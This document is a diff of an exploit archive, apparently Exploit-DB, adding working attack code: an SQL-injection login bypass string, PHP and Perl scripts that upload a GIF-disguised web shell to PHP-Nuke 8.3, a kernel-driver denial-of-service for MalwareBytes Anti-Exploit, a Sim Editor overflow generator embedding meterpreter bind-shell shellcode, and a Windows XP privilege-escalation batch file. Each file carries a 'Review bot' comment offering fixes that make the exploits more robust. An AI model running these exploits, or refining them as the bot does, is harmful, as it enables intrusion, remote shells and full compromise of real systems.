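+user: admin' or '1=1
+pass: anything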
57
platforms/php/webapps/35853.php
Executable file
57
platforms/php/webapps/35853.php
Executable file
|
@ -0,0 +1,57 @@
|
|||
source: http://www.securityfocus.com/bid/48257/info
|
||||
|
||||
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
|
||||
|
||||
Phpnuke 8.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
///////////////////////////////////////////////////
|
||||
#Iranian Pentesters Home
|
||||
#PHP Nuke 8.3 MT AFU Vulnerability
|
||||
#Coded by:4n0nym0us & b3hz4d
|
||||
#http://www.pentesters.ir
|
||||
///////////////////////////////////////////////////
|
||||
//Settings:
|
||||
$address = 'http://your-target.com';
|
||||
$file = 'shell.php.01';
|
||||
$prefix='pentesters_';
|
||||
|
||||
|
||||
//Exploit:
|
||||
@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
|
||||
@$file_data .= file_get_contents($file);
|
||||
file_put_contents($prefix . $file, $file_data);
|
||||
$file = $prefix . $file;
|
||||
echo "\n" . "///////////////////////////////////" ."\n";
|
||||
echo " Iranian Pentesters Home" . "\n";
|
||||
echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
|
||||
echo "///////////////////////////////////" ."\n";
|
||||
$address_c = $address . '/includes/richedit/upload.php';
|
||||
$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
|
||||
$data = post_data($address_c, $postdata);
|
||||
$start = strpos($data, "<img src=\"upload");
|
||||
if ($start != null)
|
||||
{
|
||||
$data = substr($data,$start + 10);
|
||||
$end = strpos($data, "\"");
|
||||
$data = substr($data,0,$end);
|
||||
echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
|
||||
}
|
||||
else
|
||||
echo "\n" . "Upload Failed!!!";
|
||||
function post_data($address, $data)
|
||||
{
|
||||
$curl = curl_init($address);
|
||||
curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
|
||||
curl_setopt($curl, CURLOPT_POST, 1);
|
||||
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
|
||||
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
|
||||
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
|
||||
$content = curl_exec($curl);
|
||||
curl_close($curl);
|
||||
return $content;
|
||||
}
|
||||
?>
|
||||
|
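Review bot: `if ($start != null)` tests the `strpos()` result with a loose comparison, so a match at offset 0 is reported as `Upload Failed!!!` and the `false` no-match value is only caught by accident; `if ($start !== false)` is the documented idiom. The `@` prefixes on the two `$file_data` lines suppress the warning when `$file` cannot be read, so an empty payload is silently written and posted; drop the `@` and check `file_get_contents()` for `false` before continuing. The `"@$file;type=image/gif"` form of `CURLOPT_POSTFIELDS` was deprecated in PHP 5.5 and removed in 7.0 in favour of `CURLFile`, which is worth recording in the header since the script targets a 2011 release and will not run unchanged on current PHP.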
49
platforms/php/webapps/35854.pl
Executable file
49
platforms/php/webapps/35854.pl
Executable file
|
@ -0,0 +1,49 @@
|
|||
source: http://www.securityfocus.com/bid/48257/info
|
||||
|
||||
Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
|
||||
|
||||
Phpnuke 8.3 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
###################################################
|
||||
#//Iranian Pentesters Home
|
||||
#//PHP Nuke 8.3 MT AFU Vulnerability
|
||||
#//Coded by:4n0nym0us & b3hz4d
|
||||
#//http://www.pentesters.ir
|
||||
###################################################
|
||||
|
||||
|
||||
use LWP;
|
||||
use HTTP::Request::Common;
|
||||
print "\n" . "///////////////////////////////////" ."\n";
|
||||
print " Iranian Pentesters Home" . "\n";
|
||||
print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
|
||||
print "///////////////////////////////////" ."\n";
|
||||
print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";
|
||||
my $url = $ARGV[0]."/includes/richedit/upload.php";
|
||||
my $filename = $ARGV[1];
|
||||
my $prefix = $ARGV[2];
|
||||
my $rfile = $prefix . $filename . ".gif";
|
||||
open fhandle, $ARGV[1] or die $!;
|
||||
while (<fhandle>){
|
||||
$shell .= $_;
|
||||
}
|
||||
close fhandle;
|
||||
open fhandle, ">", $rfile or die $!;
|
||||
print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
|
||||
close(fhandle);
|
||||
my $ua = LWP::UserAgent->new;
|
||||
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
|
||||
my $req = POST $url, Content_Type => 'form-data',
|
||||
Content => [
|
||||
upload => "1",
|
||||
path => 'images',
|
||||
pwd => "1",
|
||||
userfile => [ $rfile,$prefix . $filename ]
|
||||
];
|
||||
my $res = $ua->request($req);
|
||||
$between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
|
||||
print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
|
||||
exit;
|
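Review bot: The first `open fhandle, $ARGV[1] or die $!;` is a two-argument open on a bareword handle, so a filename that begins with `>`, `<` or `|` is interpreted as a mode or a pipe rather than a path; `open(my $in, '<', $ARGV[1]) or die $!;` with a lexical handle, matching the three-argument form already used for the output file, removes that ambiguity. The script has no `use strict; use warnings;`, `$shell` and `$between` are never declared, and nothing verifies that `$ARGV[0]` and `$ARGV[1]` were supplied, so running it with no arguments appears to fail on the `open` rather than on the usage line printed just above it. `$res->as_string()` is also evaluated four times in the single `substr`/`index` expression; binding it once to a local makes the slicing readable.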
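--- a/platforms/windows/dos/35842.c
+++ b/platforms/windows/dos/35842.c
@@ -0,0 +1,71 @@
+/*
+
+Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
+Date - 19th January 2015
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - https://www.malwarebytes.org
+Tested Version - 1.03.1.1220, 1.04.1.1012
+Driver Version - no version set - mbae.sys
+Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
+OSVDB - http://www.osvdb.org/show/osvdb/114249
+CVE ID - CVE-2014-100039
+Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
+Fixed version - 1.05
+Fixed driver ver - no version set
+
+*/
+
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 25
+
+
+int main(int argc, char *argv[])
+{
+HANDLE hDevice;
+char devhandle[MAX_PATH];
+DWORD dwRetBytes = 0;
+BYTE sizebytes[4] = "\xff\xff\xff\x00";
+BYTE *inbuffer;
+
+
+printf("-------------------------------------------------------------------------------\n");
+printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
+printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
+printf("-------------------------------------------------------------------------------\n\n");
+
+sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
+
+inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+memset(inbuffer, 0x41, BUFSIZE);
+memcpy(inbuffer, sizebytes, sizeof(sizebytes));
+
+printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
+
+hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+
+if(hDevice == INVALID_HANDLE_VALUE)
+{
+printf("\n[-] Open %s device failed\n\n", devhandle);
+return -1;
+}
+else
+{
+printf("\n[+] Open %s device successful", devhandle);
+}
+
+printf("\n[~] Press any key to DoS . . .");
+getch();
+
+DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
+
+printf("\n[+] DoS buffer sent\n\n");
+
+CloseHandle(hDevice);
+
+return 0;
+}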
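Review bot: `inbuffer = VirtualAlloc(...)` is dereferenced by `memset` and `memcpy` without a NULL check, so an allocation failure crashes the PoC in user mode and could be mistaken for the driver fault being demonstrated; add `if (!inbuffer) { printf("\n[-] VirtualAlloc failed\n"); return -1; }` before the `memset`. `getch()` is called without `#include <conio.h>`, so the build relies on an implicit declaration. The return value of `DeviceIoControl` and `GetLastError()` are discarded, so against a patched driver (the header names 1.05 as fixed) a rejected request prints the same "[+] DoS buffer sent" as a successful one; printing the status would let the program double as a regression check that the fix is in place. `argc` and `argv` are unused.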
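--- a/platforms/windows/local/35821.txt
+++ b/platforms/windows/local/35821.txt
@@ -0,0 +1,135 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define SIZE 65536
+
+/*
+* Title: Sim Editor v6.6 Stack Based Buffer Overflow
+* Version: 6.6
+* Tested on: Windows XP sp2 en, Windows 8 64-bit
+* Date: 16-01-2015
+* Author: Osanda Malith Jayathissa
+* E-Mail: osanda[cat]unseen.is
+* Website: OsandaMalith.wordpress.com
+* CVE: CVE-2015-1171
+*/
+
+const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
+"3231561503561583eefce2a496ab54"
+"46672c07cf821d15abc70ca9b88abc"
+"42ec3e36263830ff8d1e7f00209ed3"
+"c222622e17855be16ac49c1c849475"
+"6a3709f22e8428d424b45251fa41e9"
+"582bf96612d3712082e25632feadd3"
+"81752c32d8761e7ab749ae77c98e09"
+"68bce46915c73f13c142ddb382f505"
+"454663ce4923e7884db224a36a3fcb"
+"63fb7be8a7a7d891fe0d8eaee0ea6f"
+"0b6b187b2d36777abf4d3e7cbf4d11"
+"158ec6fe620f0dbb9d450fea3500da"
+"ae5bb331ec6530b38d9128b688deee"
+"2be14f9b4b566f8e262bff50d1a58b"
+"92";
+
+/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
+const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
+"4a83effc315f11035f11e2ca04054e"
+"34f5d62fbd10e77dd9515ab2aa3457"
+"39feacec4fd6c345e500ed56cb8ca1"
+"954d70b8c9ad49731caf8e6eeffd47"
+"e44212ecb85e99be2ce77e744cc6d0"
+"0317c8d3c02341cc050f1b67fdfb9a"
+"a1cc04ad8d823a0100db7ba6fbae77"
+"d486a843a65c3d560016e5b2b0fb73"
+"30beb0f01ea347d514dfccd8fa6996"
+"fede324c9f479f23a098479b04d26a"
+"c831b9e23d7342f3290431c1f6bedd"
+"697e18198d55dcb570561c9fb6024c"
+"b71f2b07479ffe87170f5167c8ef01"
+"0f02e07e2f2d2a179e098670e2ad38"
+"dd6b4b50cd3dc3cd2f1adc6a4f4970"
+"22c7c69ef4e8d7b45644705f2d8645"
+"7e3283ee17a5597e55575dab0f97cb"
+"5786c06355ff272ca62a3ce532952b"
+"0ad215ac5cb815c4389845f14635fa"
+"aad2b5ab1f74dd5179b242a9ac42bf"
+"7c89c0c90af908";
+
+const char *shells[] = { shell1, shell2 };
+const char *shell_names[] = { "MS Paint", "Bind Shell" };
+const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
+const size_t SHELLS_COUNT = 2;
+
+int menu() {
+size_t shell_type = SHELLS_COUNT;
+puts("\b[?] Choose an Option: ");
+size_t i;
+for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
+scanf("%i", &shell_type);
+return shell_type;
+}
+
+void banner() {
+static const char banner[] =
+" _____ _ _____ _ _ _ \n"
+"| __|_|_____ | __|_| |_| |_ ___ ___ \n"
+"|__ | | | | __| . | | _| . | _|\n"
+"|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
+"\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
+"[~] Author: Osanda Malith Jayathissa\n"
+"[~] E-Mail: osanda[cat]unseen.is\n"
+"[~] Website: OsandaMalith.wordpress.com\n\n";
+
+fwrite(banner, sizeof(char), sizeof(banner) , stdout);
+}
+
+void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
+size_t pattern_len = strlen(pattern);
+count *= pattern_len;
+if (count > dst_size) count = dst_size;
+if (pattern_len > dst_size) pattern_len = dst_size;
+
+size_t i, pI;
+for (i = 0, pI = 0; i < count ; i++, pI++) {
+if (pI == pattern_len) pI = 0;
+dst[i] = pattern[pI];
+}
+}
+
+int main() {
+banner();
+int shell_type = menu();
+if (shell_type >= SHELLS_COUNT) {
+printf("[-] Enter a valid input\n");
+exit (1);
+}
+
+char *buff = (char*) calloc (SIZE, sizeof(char));
+char *nops = (char*) calloc (SIZE, sizeof(char));
+if (!buff || !nops) exit (1);
+
+patternfill(buff, "41", 405, SIZE);
+patternfill(nops, "90", 16, SIZE);
+
+char ret[] = "B3804200";
+const char* filename = "exploit.sms";
+
+FILE *outfile = fopen(filename, "w");
+if (!outfile) {
+printf("%s\n","Could not open file");
+exit (1);
+}
+
+fputs(buff, outfile);
+fputs(ret, outfile);
+fputs(nops, outfile);
+
+fputs(shells[shell_type], outfile);
+printf("%s", shell_info[shell_type]);
+fclose(outfile);
+free(buff);
+printf("[+] Successfully to written to: \"%s\"\n", filename);
+return 0;
+}
+/*EOF*/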
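Review bot: `fwrite(banner, sizeof(char), sizeof(banner) , stdout)` in `banner()` also emits the string's terminating NUL, because `sizeof` on a char array counts it; `fputs(banner, stdout)` (or `sizeof(banner) - 1`) avoids the stray byte. In `menu()`, `scanf("%i", &shell_type)` passes a `size_t *` where `%i` expects `int *` and its return value is never checked, and `printf("%d. %s\n", i, shell_names[i])` prints a `size_t` with `%d`; declaring `shell_type` as `int`, testing `scanf(...) == 1`, and using `%zu` for `i` removes the undefined behaviour. In `main()`, `nops` is allocated but never freed alongside `buff`. The header records the CVE but, unlike the 35842.c header in this commit, no vendor or fix status, which readers consulting the archive for remediation would want.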
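--- a/platforms/windows/local/35850.bat
+++ b/platforms/windows/local/35850.bat
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/48232/info
+
+Microsoft Windows is prone to a local privilege-escalation vulnerability.
+
+A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
+
+@echo off
+echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
+start time /T > time.txt
+tskill explorer
+time 13:36:59 > nul
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+cls
+at 13:37 /interactive cmd.exe
+at 13:37 /interactive explorer.exe
+at 13:37 /interactive at /del /y
+
+
+echo [*] Backup time
+time < time.txt
+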
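Review bot: The three description lines above `@echo off` (the `source:` URL and the two advisory sentences) are not batch comments, so cmd.exe tries to execute them and prints "not recognized" errors before the script proper runs; prefix each with `rem ` (or `::`) so the file stays parseable. Unlike the other new files in this commit, there is no header giving title, date, author, affected versions or CVE — only the BID link — so at least a `rem` line stating the Windows XP SP2/SP3 scope named in the `echo` would help readers of the archive. From a defensive reading, the technique depends on altering the system clock and scheduling interactive `at` jobs, both of which typically leave event-log and scheduler-log traces; a header note pointing at those signals would be useful to the detection-minded audience of this repository.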
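--- a/platforms/windows/remote/35841.txt
+++ b/platforms/windows/remote/35841.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Bsplayer HTTP Response BOF
+# Date: Jan 17 ,2015
+# Exploit Author: Fady Mohamed Osman (@fady_osman)
+# Vendor Homepage: www.bsplayer.com
+# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
+# Version: current (2.68).
+# Tested on: Windows 7 sp1 x86 version.
+# Exploit-db : http://www.exploit-db.com/author/?a=2986
+# Youtube : https://www.youtube.com/user/cutehack3r
+
+Exploit: http://www.exploit-db.com/sploits/35841.tar.gz
+
+Bsplayer suffers from a buffer overflow vulnerability when processing the
+HTTP response when opening a URL. In order to exploit this bug I needed to
+load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed
+that one of the dlls that matches this criteria is (MSVCR71.dll) and it's
+loaded when I loaded an flv file over the network and that's why I'm
+sending a legitimate flv file first so later we can use the loaded dll.
+Also the space after the seh record is pretty small so what I did is that I
+added a small stage shell cdoe to add offset to esp so it points at the
+beginning of my buffer and then a jmp esp instruction to execute the actual
+shellcode.
+
+
+--
+
+*Regards,*
+
+Fady Osman
+about.me/Fady_Osman
+<http://about.me/Fady_Osman>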